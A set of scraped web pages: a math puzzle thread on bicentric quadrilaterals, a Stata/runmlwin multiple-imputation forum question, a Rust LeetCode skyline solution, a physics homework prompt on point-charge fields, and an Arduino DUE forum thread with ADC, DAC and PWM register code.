https://puzzling.stackexchange.com/questions/22446/professor-halfbrains-quadrilateral-theorem
[ "Professor Halfbrain has recently made a fascinating discovery on quadrilaterals in the plane.\n\nHalfbrain's quadrilateral theorem: Let $ABCD$ be a plane quadrilateral that possesses an incircle and a circumcircle. If the center of the incircle coincides with the center of the circumcircle, then $ABCD$ is a square.\n\nQuestion: Is this theorem indeed true, or has the professor once again made one of his mathematical blunders?\n\nIt is\n\ntrue\n\nProof:\n\nLet's first draw the concentric incircle and circumcircle. We draw the quadrilateral starting with a vertex on the outer circle and proceeding clockwise. The edge leaving that vertex must be tangent to the inner circle and so is forced.\nThe next vertex is where this line intersects the outer circle. Now, we're in the same situation as before, but rotated. So, the resulting shape must be rotationally-symmetric (edge-transitive).\nIf it returns to the initial vertex without crossing itself, it must be a regular polygon. If it has four edges, it's a square.\n\nThe theorem is...\n\n... not true. There are an infinite number of concave quadrangles which also bicentric with a incentre-circumcentre distance of zero, each one associated with a specific out-radius:in-radius ratio $R/r$, where $R/r < \\sqrt{2}$. According to Fuss' Theorem, only in the special case where $R/r = \\sqrt{2}$ does a square solution appear.\n\nProof:\n\nTo construct a concave solution, within a given circle, draw two arbitrary chords $AB$ and $AD$ from $A$, such that $\\angle BAD < 60^{\\circ}$. Then, draw the incircle such that the chords $AB$ and $AD$ are both tangent to the incircle. Finally, choose a point $C$ on the incircle to complete the quadrangle $ABCD$.\n\n• Does a concave quadrilateral have a circumcircle? I understand that to mean that all four points lie on that circle, i.e. it is a cyclic quadrilateral.\n– xnor\nSep 21, 2015 at 9:37\n• By the way, your construction didn't work for me. 
Also, Fuss' theorem applies to any bicentric quad. If you plug $d=0$ into it, you get $R/r = \\sqrt{2}$, which only holds for a square. Sep 21, 2015 at 9:53\n• Yes, Fuss' Theorem only applies to simple convex quadrilaterals. For the concave case, as xnor has noticed, I took the liberty of generalizing the incircle and circumcircle to the maximum inscribable circle and the minimum bounding circle, respectively (otherwise both are hilariously undefined for the concave polygon). Sep 21, 2015 at 10:00" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.9007356,"math_prob":0.99130595,"size":1640,"snap":"2023-40-2023-50","text_gpt3_token_len":384,"char_repetition_ratio":0.119804405,"word_repetition_ratio":0.0,"special_character_ratio":0.22012195,"punctuation_ratio":0.12861736,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.99959177,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2023-10-03T20:08:46Z\",\"WARC-Record-ID\":\"<urn:uuid:0087acca-1c57-45a4-a526-3525ae45858e>\",\"Content-Length\":\"170153\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:534476ca-b968-452c-a543-5d1b2e427201>\",\"WARC-Concurrent-To\":\"<urn:uuid:c170ea2b-603e-4a4b-a4ef-680ee8e89182>\",\"WARC-IP-Address\":\"104.18.11.86\",\"WARC-Target-URI\":\"https://puzzling.stackexchange.com/questions/22446/professor-halfbrains-quadrilateral-theorem\",\"WARC-Payload-Digest\":\"sha1:XIMFPRPV3IYGZQTQBKUQAOSRXBEQIXGO\",\"WARC-Block-Digest\":\"sha1:IYMAI5K6NRQZZSPB6EB75N4OSMHKOCPW\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2023/CC-MAIN-2023-40/CC-MAIN-2023-40_segments_1695233511220.71_warc_CC-MAIN-20231003192425-20231003222425-00824.warc.gz\"}"}
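The Fuss relation the answers lean on, $1/(R-d)^2 + 1/(R+d)^2 = 1/r^2$, is easy to sanity-check for the concentric convex case. A minimal Python sketch (the helper names are mine, not from the thread):

```python
import math

def square_radii(side):
    """Circumradius and inradius of a square with the given side length."""
    R = side * math.sqrt(2) / 2  # half the diagonal
    r = side / 2                 # half the side (apothem)
    return R, r

def fuss_lhs(R, r, d):
    """Left-hand side of Fuss' relation, 1/(R-d)^2 + 1/(R+d)^2."""
    return 1 / (R - d) ** 2 + 1 / (R + d) ** 2

R, r = square_radii(2.0)
# Concentric case: d = 0 reduces the relation to 2/R^2 = 1/r^2,
# i.e. R/r = sqrt(2) -- the only convex solution, as the second answer says.
assert math.isclose(R / r, math.sqrt(2))
assert math.isclose(fuss_lhs(R, r, 0.0), 1 / r ** 2)
```

The check confirms the comment above: plugging $d=0$ into Fuss' relation forces $R/r = \sqrt{2}$ among convex bicentric quadrilaterals.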
https://www.cmm.bristol.ac.uk/forum/viewtopic.php?f=3&p=7438&sid=cb966e98d17e1b0e081d8b6462d96f98
[ "## Combining mcmc(cc) logit results using mi estimate\n\nWelcome to the forum for runmlwin users. Feel free to post your question about runmlwin here. The Centre for Multilevel Modelling take no responsibility for the accuracy of these posts, we are unable to monitor them closely. Do go ahead and post your question and thank you in advance if you find the time to post any answers!\n\nGo to runmlwin: Running MLwiN from within Stata >> http://www.bristol.ac.uk/cmm/software/runmlwin/\nmlwinmlwin\nPosts: 1\nJoined: Fri Apr 23, 2021 8:16 pm\n\n### Combining mcmc(cc) logit results using mi estimate\n\nThank you in advance! I am relatively new to runmlwin and Bayesian models.\n\nI am running a longitudinal cross-classified logit model (10 rounds of individual observations, and individuals can move across states over the 10 years). Due to missingness, I used \"mi impute chained\" to impute missing data. Based on my reading of previous posts, I know I should be able to use \"mi estimate, cmdok\" to combine the results across imputed datasets. Here are my codes:\n\nSTEP 1:\ngen cons=1\n\nmi estimate, cmdok noisily post imputations (1/5): ///\nrunmlwin DV cons IV1 IV2 IV3, ///\nlevel3 (state_fips: cons) ///\nlevel2 (study_id: cons) ///\nlevel1 (year:) ///\ndiscrete(dist(binomial) link(logit) denom(cons)) nopause forcesort\n\nestimates store m_prior\n\nSTEP 2:\nmi estimate, cmdok noisily imputations (1/5): ///\nrunmlwin DV cons IV1 IV2 IV3, ///\nlevel3 (state_fips: cons) ///\nlevel2 (study_id: cons) ///\nlevel1 (year:) ///\ndiscrete(dist(binomial) link(logit) denom(cons)) mcmc(cc) initsmodel(m_prior) nopause forcesort\n\n1) Do my codes look correct? (I have been running them successfully for my analysis, but want to double-check with experts here)\n\n2) More specifically, in both step 1 and step 2, when showing the combined results, I observed \"Average RVI = .\", \"Largest FMI=. \", \"DF: avg =.\", and \"DF: max =.\". 
Are these normal to see?\n\n3) Most importantly, in step 2 with MCMC(CC), how can we interpret \"Coef. Std. Err. t P>|t| [95% Conf. Interval]\" in the combined results? In each iteration (i.e., m=1, 2, etc.), we get \"Mean Std. Dev. ESS P [95% Cred. Interval]\". Can we interpret [95% Conf. Interval] in the combined results the same as [95% Cred. Int] derived in each iteration (i.e., m=1, 2, etc.)? How about the p-values in the combined results? Are these p-values in the combined results one-sided or two-sided? Any other things I should be aware of when interpreting the combined results?\n\nThank you again!\nChrisCharlton\nPosts: 1252\nJoined: Mon Oct 19, 2009 10:34 am\n\n### Re: Combining mcmc(cc) logit results using mi estimate\n\nI asked George about this and he had the following suggestions, although we are not that familiar with the mi estimate command:\n1. You can probably skip step 1 and just supply some plausible starting values to step 2, rather than having to do two sets of imputations. Otherwise the runmlwin syntax looks fine.\n2. We aren't really sure what these statistics refer to, and suggest looking at the documentation for https://www.stata.com/help.cgi?mi_estimate to see if that gives some guidance.\n3. It is probable that the command is combining the results from the five sets of models using Rubin's rules on the means of the chains returned in e(b) and e(V). This would suggest that what is returned would be regular 2-sided p-values." ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.87804407,"math_prob":0.6644344,"size":2829,"snap":"2021-21-2021-25","text_gpt3_token_len":762,"char_repetition_ratio":0.110442474,"word_repetition_ratio":0.10367171,"special_character_ratio":0.27712974,"punctuation_ratio":0.16319445,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.95633703,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2021-06-23T15:51:21Z\",\"WARC-Record-ID\":\"<urn:uuid:e5e0a47b-c48e-4fc1-8608-1a2c31bd5026>\",\"Content-Length\":\"26714\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:71ed355f-9240-4098-b9d0-b71d6b00ab21>\",\"WARC-Concurrent-To\":\"<urn:uuid:60caa61f-f191-4692-94b9-3d15a9586e28>\",\"WARC-IP-Address\":\"137.222.0.123\",\"WARC-Target-URI\":\"https://www.cmm.bristol.ac.uk/forum/viewtopic.php?f=3&p=7438&sid=cb966e98d17e1b0e081d8b6462d96f98\",\"WARC-Payload-Digest\":\"sha1:KCUNHLI7CX3MZJZNBH6Z3UVH4DVUVST2\",\"WARC-Block-Digest\":\"sha1:FH5WVGOHXAGHOTRCXN6GI5DYYY3QO4MB\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2021/CC-MAIN-2021-25/CC-MAIN-2021-25_segments_1623488539480.67_warc_CC-MAIN-20210623134306-20210623164306-00603.warc.gz\"}"}
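George's third point, that `mi estimate` is probably pooling the per-imputation posterior means from `e(b)` and `e(V)` via Rubin's rules, can be spelled out. A hedged Python sketch of Rubin's rules for a single scalar coefficient (the numbers are invented for illustration, not taken from the thread):

```python
import math

def rubin_pool(estimates, variances):
    """Pool per-imputation point estimates and variances via Rubin's rules."""
    m = len(estimates)
    qbar = sum(estimates) / m                              # pooled point estimate
    w = sum(variances) / m                                 # within-imputation variance
    b = sum((q - qbar) ** 2 for q in estimates) / (m - 1)  # between-imputation variance
    t = w + (1 + 1 / m) * b                                # total variance
    return qbar, t

# Invented stand-ins for the posterior means and squared posterior SDs
# that the five MCMC runs would return.
est = [0.42, 0.40, 0.44, 0.41, 0.43]
var = [0.010, 0.012, 0.011, 0.009, 0.010]
qbar, t = rubin_pool(est, var)
se = math.sqrt(t)   # pooled standard error behind the combined Std. Err. column
```

The pooled `qbar` and `se` are what the combined `Coef.`/`Std. Err.` columns would then report, with the usual symmetric (two-sided) t-based intervals built on top.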
https://rustgym.com/leetcode/807
[ "## 807. Max Increase to Keep City Skyline\n\nIn a 2 dimensional array `grid`, each value `grid[i][j]` represents the height of a building located there. We are allowed to increase the height of any number of buildings, by any amount (the amounts can be different for different buildings). Height 0 is considered to be a building as well.\n\nAt the end, the \"skyline\" when viewed from all four directions of the grid, i.e. top, bottom, left, and right, must be the same as the skyline of the original grid. A city's skyline is the outer contour of the rectangles formed by all the buildings when viewed from a distance. See the following example.\n\nWhat is the maximum total sum that the height of the buildings can be increased?\n\n```Example:\nInput: grid = [[3,0,8,4],[2,4,5,7],[9,2,6,3],[0,3,1,0]]\nOutput: 35\nExplanation:\nThe grid is:\n[ [3, 0, 8, 4],\n[2, 4, 5, 7],\n[9, 2, 6, 3],\n[0, 3, 1, 0] ]\n\nThe skyline viewed from top or bottom is: [9, 4, 8, 7]\nThe skyline viewed from left or right is: [8, 7, 9, 3]\n\nThe grid after increasing the height of buildings without affecting skylines is:\n\ngridNew = [ [8, 4, 8, 7],\n[7, 4, 7, 7],\n[9, 4, 8, 7],\n[3, 3, 3, 3] ]\n\n```\n\nNotes:\n\n• `1 < grid.length = grid[0].length <= 50`.\n• All heights `grid[i][j]` are in the range `[0, 100]`.\n• All buildings in `grid[i][j]` occupy the entire grid cell: that is, they are a `1 x 1 x grid[i][j]` rectangular prism.\n\n## Rust Solution\n\n``````struct Solution;\n\nimpl Solution {\nfn max_increase_keeping_skyline(grid: Vec<Vec<i32>>) -> i32 {\nlet n = grid.len();\nlet m = grid[0].len();\nlet mut row: Vec<i32> = vec![0; n];\nlet mut col: Vec<i32> = vec![0; m];\nlet mut res = 0;\nfor i in 0..n {\nfor j in 0..m {\nrow[i] = row[i].max(grid[i][j]);\ncol[j] = col[j].max(grid[i][j]);\n}\n}\nfor i in 0..n {\nfor j in 0..m {\nres += row[i].min(col[j]) - grid[i][j];\n}\n}\nres\n}\n}\n\n#[test]\nfn test() {\nlet grid = vec_vec_i32![[3, 0, 8, 4], [2, 4, 5, 7], [9, 2, 6, 3], [0, 3, 1, 0]];\nlet res 
= 35;\nassert_eq!(Solution::max_increase_keeping_skyline(grid), res);\n}\n``````\n\nHaving problems with this solution? Click here to submit an issue on github." ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.83751017,"math_prob":0.9944588,"size":2034,"snap":"2021-21-2021-25","text_gpt3_token_len":703,"char_repetition_ratio":0.1275862,"word_repetition_ratio":0.08672087,"special_character_ratio":0.3903638,"punctuation_ratio":0.26022306,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.974389,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2021-05-16T21:25:39Z\",\"WARC-Record-ID\":\"<urn:uuid:4e6d5bd2-cebb-4a33-b6ee-cb374ada5eb9>\",\"Content-Length\":\"8389\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:cb64c1f4-4ae1-4a57-9d7d-d3227762be50>\",\"WARC-Concurrent-To\":\"<urn:uuid:2431153c-8697-42e6-95b7-163eb6e5f99d>\",\"WARC-IP-Address\":\"35.188.52.69\",\"WARC-Target-URI\":\"https://rustgym.com/leetcode/807\",\"WARC-Payload-Digest\":\"sha1:EAD7HFTSQUJV6M3TZFICZHTXBNNLGXTG\",\"WARC-Block-Digest\":\"sha1:3SCISJRLJT3L6DYDV7I5UQ53XUJKUD4Q\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2021/CC-MAIN-2021-21/CC-MAIN-2021-21_segments_1620243989914.60_warc_CC-MAIN-20210516201947-20210516231947-00602.warc.gz\"}"}
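The Rust solution's two passes — record each row's and each column's maximum, then raise every cell to the smaller of the two — port directly to Python. A sketch using the example grid from the problem statement:

```python
def max_increase_keeping_skyline(grid):
    # Skyline seen from left/right is the per-row max;
    # from top/bottom it is the per-column max.
    row_max = [max(row) for row in grid]
    col_max = [max(col) for col in zip(*grid)]
    # Each cell may grow to min(row_max, col_max) without changing either skyline.
    return sum(min(row_max[i], col_max[j]) - cell
               for i, row in enumerate(grid)
               for j, cell in enumerate(row))

grid = [[3, 0, 8, 4], [2, 4, 5, 7], [9, 2, 6, 3], [0, 3, 1, 0]]
assert max_increase_keeping_skyline(grid) == 35
```

Because the total increase at each cell is independent once the two skyline profiles are fixed, the greedy per-cell bound is exact.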
https://homework.zookal.com/questions-and-answers/a-194-109-c-charge-has-coordinates-x--0-783345693
[ "# Question: a 194 109 c charge has coordinates x 0...\n\n###### Question details\n\nA 1.94 × 10^-9 C charge has coordinates x = 0, y = −2.00; a 2.88 × 10^-9 C charge has coordinates x = 3.00, y = 0; and a -5.40 × 10^-9 C charge has coordinates x = 3.00, y = 4.00, where all distances are in cm. Determine magnitude and direction for the electric field at the origin and the instantaneous acceleration of a proton placed at the origin.\n\n(a) Determine the magnitude and direction for the electric field at the origin (measure the angle counterclockwise from the positive x-axis).\n\n(b) Determine the magnitude and direction for the instantaneous acceleration of a proton placed at the origin (measure the angle counterclockwise from the positive x-axis).\n\n###### Solution by an expert tutor", null, "" ]
[ null, "https://homework.zookal.com/images/blurredbg-mobile.png", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.83349144,"math_prob":0.99363697,"size":725,"snap":"2021-21-2021-25","text_gpt3_token_len":186,"char_repetition_ratio":0.12343967,"word_repetition_ratio":0.45901638,"special_character_ratio":0.28413793,"punctuation_ratio":0.13725491,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.98896897,"pos_list":[0,1,2],"im_url_duplicate_count":[null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2021-05-18T05:12:51Z\",\"WARC-Record-ID\":\"<urn:uuid:b80fb246-1e1f-4336-aa0d-1a3992a9602f>\",\"Content-Length\":\"120141\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:c7f331f9-0705-469f-a2c9-137a6b07341b>\",\"WARC-Concurrent-To\":\"<urn:uuid:015a19f8-e76a-4e8b-b011-3d08d4a2b0ab>\",\"WARC-IP-Address\":\"13.236.213.71\",\"WARC-Target-URI\":\"https://homework.zookal.com/questions-and-answers/a-194-109-c-charge-has-coordinates-x--0-783345693\",\"WARC-Payload-Digest\":\"sha1:GFA5F35IQIXWAAF73JQ5AQLHBRMTVWDP\",\"WARC-Block-Digest\":\"sha1:PUZTKKCQXRINKRK64X7QZLMEQAPT2HFW\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2021/CC-MAIN-2021-21/CC-MAIN-2021-21_segments_1620243989820.78_warc_CC-MAIN-20210518033148-20210518063148-00235.warc.gz\"}"}
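The requested field is the vector sum of three Coulomb terms, $\vec E = \sum_i k q_i \hat r_i / r_i^2$, evaluated at the origin, and the proton's acceleration follows from $\vec a = e\vec E/m_p$. A Python sketch of the computation (constants rounded to the usual textbook values):

```python
import math

K = 8.99e9             # Coulomb constant, N m^2 / C^2
E_CHARGE = 1.602e-19   # proton charge, C
M_PROTON = 1.673e-27   # proton mass, kg

# (charge in C, x in m, y in m) -- positions converted from cm
charges = [( 1.94e-9, 0.00, -0.02),
           ( 2.88e-9, 0.03,  0.00),
           (-5.40e-9, 0.03,  0.04)]

Ex = Ey = 0.0
for q, x, y in charges:
    r = math.hypot(x, y)
    # The field of a point charge located at (x, y), evaluated at the origin,
    # points from the charge toward the origin when q > 0 -- hence the minus signs.
    Ex += K * q * (-x) / r**3
    Ey += K * q * (-y) / r**3

E_mag = math.hypot(Ex, Ey)
E_ang = math.degrees(math.atan2(Ey, Ex)) % 360   # CCW from the +x axis
a_mag = E_CHARGE * E_mag / M_PROTON              # proton accelerates along E
```

With these rounded constants the field comes out a little above 6 × 10^4 N/C at roughly 106° from the +x axis, and the proton's acceleration points the same way since its charge is positive.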
https://forum.arduino.cc/index.php?topic=607595.0
[ "Go Down\n\n### Topic: Same code different behaviour (Read 260 times)previous topic - next topic\n\n#### Tyarel", null, "##### Apr 02, 2019, 06:15 pm\nHi everyone,\n\nI am currently working on Arduino DUE in order to generate a wave and acquire sinals from ADC (both with DMA and/or Interrupt) , first I used DAC pin but it was not suited for my work, so I changed and I am now using a \"common\" pin where a PWM wave with periodcally different duty cycle is generated.\n\nBoth methods work and do what they have to do, but ADC code, although it is the same, works only in the DAC case. In PWM case ADC_handler is never called (everything I write in ADC_handler is never computed) and the code is not stuck in a point (the loop works).\n\nIt seems like either ADC is not enabled or timer that command ADC interrupt has a problem. Actually, in the DAC case, ADC works only if DAC is working too: if DAC Init functions are commented, ADC doesn't work too.\n\nI really can not cope with this absurdity, if someone has an idea, I would be very grateful!\n\nThank you!\nLuigi\n\n#### Tyarel", null, "#1\n##### Apr 02, 2019, 08:13 pm\nDAC case code (buf[] is the lookup table)\nCode: [Select]\n`#define BaudRate 460800uint16_t volt;uint8_t flag = 0;volatile uint8_t bufn, Oldbufn, bufn_dac;const uint16_t bufsize = 150;            const uint8_t bufnumber = 1;             const uint8_t _bufnumber = bufnumber - 1;volatile uint16_t buf[bufnumber][bufsize] =...;void setup(){    Serial.begin(BaudRate);  while(!Serial);  // Wait for connection    pinMode(LED_BUILTIN, OUTPUT);  // For ADC debugging  pinMode(12, OUTPUT);           // For DACC debugging      adc_setup();  dac_setup();  tc_adc_setup();  tc_dac_setup();}void loop(){    uint8_t checksum;   if(flag == 1){    //Protocol via Serial    checksum = (uint8_t)(volt >> 8) + (uint8_t)(volt) + (uint8_t)(volt >> 8) + (uint8_t)(volt);  Serial.write(0x02); // Start of text  Serial.write((uint8_t) (volt >> 8));  Serial.write((uint8_t) volt);  
Serial.write((uint8_t) (volt >> 8));  Serial.write((uint8_t) volt);    Serial.write(checksum);    flag = 0 ;  }/*************  Configure adc_setup function  *******************/void dac_setup (){  PMC->PMC_PCER1 = PMC_PCER1_PID38;                   // DACC power ON  DACC->DACC_CR = DACC_CR_SWRST ;                     // Reset DACC  DACC->DACC_MR = DACC_MR_TRGEN_EN                    // Hardware trigger select                  | DACC_MR_TRGSEL(0b011)             // Trigger by TIOA2                  | DACC_MR_TAG_EN                    // Output on DAC0 and DAC1                  | DACC_MR_WORD_HALF                                   | DACC_MR_REFRESH (1)                  | DACC_MR_STARTUP_8                  | DACC_MR_MAXS;  DACC->DACC_ACR = DACC_ACR_IBCTLCH0(0b11) //0b10                   | DACC_ACR_IBCTLCH1(0b11) // 0b10                   | DACC_ACR_IBCTLDACCORE(0b01);  DACC->DACC_IDR = ~DACC_IDR_ENDTX;  DACC->DACC_IER = DACC_IER_ENDTX;                    // TXBUFE works too !!!  NVIC_SetPriority(DACC_IRQn, 0xFF);  NVIC_EnableIRQ(DACC_IRQn);  DACC->DACC_CHER = DACC_CHER_CH0;    // enable channels 0 = DAC0  /*************   configure PDC/DMA  for DAC *******************/  DACC->DACC_TPR  = (uint32_t)buf;                 // DMA buffer  DACC->DACC_TCR  = bufsize;  //DACC->DACC_TNPR = (uint32_t)buf;                 // next DMA buffer  //DACC->DACC_TNCR = bufsize;  bufn_dac = 1;  DACC->DACC_PTCR = DACC_PTCR_TXTEN;                  // Enable PDC Transmit channel request}/*********  Call back function for DAC PDC/DMA **************/void DACC_Handler() {   // DACC_ISR_HANDLER()         // move Sinus/PDC/DMA pointers to next buffer  //if ( DACC->DACC_ISR & DACC_ISR_ENDTX) {           // Useless because the only one  bufn_dac = (bufn_dac + 1) & _bufnumber;  DACC->DACC_TNPR = (uint32_t)buf[bufn_dac];  DACC->DACC_TNCR = bufsize;  }/*************  Configure adc_setup function  *******************/void dac_setup (){  PMC->PMC_PCER1 = PMC_PCER1_PID38;                   // DACC power 
ON  DACC->DACC_CR = DACC_CR_SWRST ;                     // Reset DACC  DACC->DACC_MR = DACC_MR_TRGEN_EN                    // Hardware trigger select                  | DACC_MR_TRGSEL(0b011)             // Trigger by TIOA2                  | DACC_MR_TAG_EN                    // Output on DAC0 and DAC1                  | DACC_MR_WORD_HALF                                   | DACC_MR_REFRESH (1)                  | DACC_MR_STARTUP_8                  | DACC_MR_MAXS;  DACC->DACC_ACR = DACC_ACR_IBCTLCH0(0b11) //0b10                   | DACC_ACR_IBCTLCH1(0b11) // 0b10                   | DACC_ACR_IBCTLDACCORE(0b01);  DACC->DACC_IDR = ~DACC_IDR_ENDTX;  DACC->DACC_IER = DACC_IER_ENDTX;                    // TXBUFE works too !!!  NVIC_SetPriority(DACC_IRQn, 0xFF);  NVIC_EnableIRQ(DACC_IRQn);  DACC->DACC_CHER = DACC_CHER_CH0;    // enable channels 0 = DAC0  /*************   configure PDC/DMA  for DAC *******************/  DACC->DACC_TPR  = (uint32_t)buf;                 // DMA buffer  DACC->DACC_TCR  = bufsize;  //DACC->DACC_TNPR = (uint32_t)buf;                 // next DMA buffer  //DACC->DACC_TNCR = bufsize;  bufn_dac = 1;  DACC->DACC_PTCR = DACC_PTCR_TXTEN;                  // Enable PDC Transmit channel request}/*********  Call back function for DAC PDC/DMA **************/void DACC_Handler() {   // DACC_ISR_HANDLER()         // move Sinus/PDC/DMA pointers to next buffer  //if ( DACC->DACC_ISR & DACC_ISR_ENDTX) {           // Useless because the only one  bufn_dac = (bufn_dac + 1) & _bufnumber;  DACC->DACC_TNPR = (uint32_t)buf[bufn_dac];  DACC->DACC_TNCR = bufsize;  }`\n\n#### Tyarel", null, "#2\n##### Apr 02, 2019, 08:19 pm\nPWM case code:\n\nCode: [Select]\n`#define BaudRate 460800#define sinsize  (64)                // Sample number (a power of 2 is better)#define PERIOD_VALUE  (4200)        // For a 312.5 Hz sinwave 4200 + 64 samples#define NbCh      (1)                 // Only channel 0 ---> Number of channels = 1#define DUTY_BUFFER_LENGTH      (sinsize * NbCh) // Half 
wordsuint16_t volt;uint8_t flag = 0;uint16_t Duty_Buffer[DUTY_BUFFER_LENGTH];#define UpdatePeriod_Msk (0b1111)#define UpdatePeriod    (UpdatePeriod_Msk & 0b0000) //Defines the time between each duty cycle update of the synchronous channels//This time equals to (UpdatePeriod + 1) periods of the Reference channel 0uint16_t Sin_Duty[sinsize];void setup () {  //Generate lookup table  for (int i = 0; i < sinsize; i++) {    Sin_Duty[i] = 1 + (2047 * (sin( i * 2 * PI / sinsize ) + 1));  }  for (uint32_t i = 0; i < sinsize; i++) {    Duty_Buffer[i * NbCh + 0] = Sin_Duty[i];    adc_setup();  tc_adc_setup();  PWM_setup();    }  Serial.begin(BaudRate);  while(!Serial);  // Wait for connection}void loop(){    uint8_t checksum;   if(flag == 1){    //Protocol via Serial    checksum = (uint8_t)(volt >> 8) + (uint8_t)(volt) + (uint8_t)(volt >> 8) + (uint8_t)(volt);  Serial.write(0x02); // Start of text  Serial.write((uint8_t) (volt >> 8));  Serial.write((uint8_t) volt);  Serial.write((uint8_t) (volt >> 8));  Serial.write((uint8_t) volt);    Serial.write(checksum);    flag = 0 ;  }}void PWM_setup(){    PMC->PMC_PCER1 |= PMC_PCER1_PID36;       // PWM controller power ON  PMC->PMC_PCER0 |= PMC_PCER0_PID13;       // PIOC power ON  // PWML0 on PC2, peripheral type B: Pin34  PIOC->PIO_PDR |= PIO_PDR_P2;  PIOC->PIO_ABSR |= PIO_PC2B_PWML0;  // Set synchro channels list : Channel 0  PWM->PWM_DIS = PWM_DIS_CHID0;  PWM->PWM_SCM  = PWM_SCM_SYNC0          // Add SYNCx accordingly, at least SYNC0                  | PWM_SCM_UPDM_MODE2;  //Automatic write of duty-cycle update registers by the PDC DMA  // Set duty cycle update period  PWM->PWM_SCUP = PWM_SCUP_UPR(UpdatePeriod);  // Set the PWM Reference channel 0 i.e. 
: Clock/Frequency/Alignment  PWM->PWM_CLK = PWM_CLK_PREA(0b0000) | PWM_CLK_DIVA(1);        // Set the PWM clock rate for 84 MHz/1  PWM->PWM_CH_NUM.PWM_CMR = PWM_CMR_CPRE_CLKA;               // The period is left aligned, clock source as CLKA on channel 0  PWM->PWM_CH_NUM.PWM_CPRD = PERIOD_VALUE;                   // Set the PWM frequency (84MHz/1)/PERIOD_VALUE Hz  /****  Final frequency = MCK/DIVA/PRES/CPRD/(UPR + 1)/sinsize  ****/  // Set Interrupt events  PWM->PWM_IER2 = PWM_IER2_WRDY;   //Write Ready for Synchronous Channels Update Interrupt Enable  //synchro with ENDTX End of TX Buffer Interrupt Enable  // Fill duty cycle buffer for channels 0, x, y ...  // Duty_Buffer is a buffer of Half Words(H_W) composed of N lines which structure model for each duty cycle update is :  // [ H_W: First synchro channel 0 duty cycle **Mandatory** ]/[ H_W: Second synchro channel duty cycle ] ... and so on    PWM->PWM_ENA = PWM_ENA_CHID0;                  // Enable PWM for all channels, channel 0 Enable is sufficient  PWM->PWM_TPR  = (uint32_t)Duty_Buffer;        // FIRST DMA buffer  PWM->PWM_TCR  = DUTY_BUFFER_LENGTH;           // Number of Half words  //PWM->PWM_TNPR = (uint32_t)Duty_Buffer;        // Next DMA buffer  //PWM->PWM_TNCR = DUTY_BUFFER_LENGTH;  PWM->PWM_PTCR = PWM_PTCR_TXTEN;               // Enable PDC Transmit channel request    NVIC_EnableIRQ(PWM_IRQn);  NVIC_SetPriority(PWM_IRQn, 0x01);  }void PWM_Handler() {  // move PDC DMA pointers to next buffer  PWM->PWM_ISR2;      // Clear status register  PWM->PWM_TNPR = (uint32_t)Duty_Buffer;  PWM->PWM_TNCR = DUTY_BUFFER_LENGTH;}}/*******  Timer Counter 0 Channel 1 to generate PWM pulses thru TIOA1  for ADC ********/void tc_adc_setup() {   PMC->PMC_PCER0 |= PMC_PCER0_PID28;                      // TC1 power ON : Timer Counter 0 channel 1  TC0->TC_CHANNEL.TC_CMR = TC_CMR_TCCLKS_TIMER_CLOCK2  // MCK/8, clk on rising edge                              | TC_CMR_WAVE               // Waveform mode                              
| TC_CMR_WAVSEL_UP_RC       // UP mode with automatic trigger on RC Compare                              | TC_CMR_ACPA_CLEAR         // Clear TIOA1 on RA compare match                              | TC_CMR_ACPC_SET;          // Set TIOA1 on RC compare match  TC0->TC_CHANNEL.TC_RC = 1000;  //<********************   Frequency = (Mck/8)/TC_RC  Hz = 4000 Hz -> Adc can be sampled less frequently because  a range of 5 values verify the if caluse in adchandler  TC0->TC_CHANNEL.TC_RA = 20;    //<********************   Any Duty cycle in between 1 and TC_RC  TC0->TC_CHANNEL.TC_CCR = TC_CCR_CLKEN;               // TC1 enable}`\n\n#### Tyarel", null, "#3\n##### Apr 02, 2019, 08:27 pm\nADC code which is the same for both cases, I apologize but the limit of words forced me to split the code in different posts\n\nCode: [Select]\n`/*************  Configure adc_setup function  *******************/void adc_setup() {  PMC->PMC_PCER1 |= PMC_PCER1_PID37;                    // ADC power ON  ADC->ADC_CR = ADC_CR_SWRST;                           // Reset ADC  ADC->ADC_MR |=  ADC_MR_TRGEN_EN                       // Hardware trigger select                  | ADC_MR_TRGSEL_ADC_TRIG2             // Trigger by TIOA1                  | ADC_MR_PRESCAL(1);  //ADC->ADC_ACR = ADC_ACR_IBCTL(0b01);                 // For frequencies > 500 KHz  ADC->ADC_IDR = ~ADC_IDR_EOC7;  ADC->ADC_IER = ADC_IER_EOC7;                          // End Of Conversion interrupt enable for channel 7  NVIC_EnableIRQ(ADC_IRQn);                             // Enable ADC interrupt  NVIC_SetPriority(ADC_IRQn, 0x00);  ADC->ADC_CHER = ADC_CHER_CH5 | ADC_CHER_CH6 | ADC_CHER_CH7;               // Enable Channels 7 = A0 and 6 = A1, 5 A2; Trigger frequency is multiplied by 3                                                                            // The sampling frequency for 1 channel times the number of channels !!  
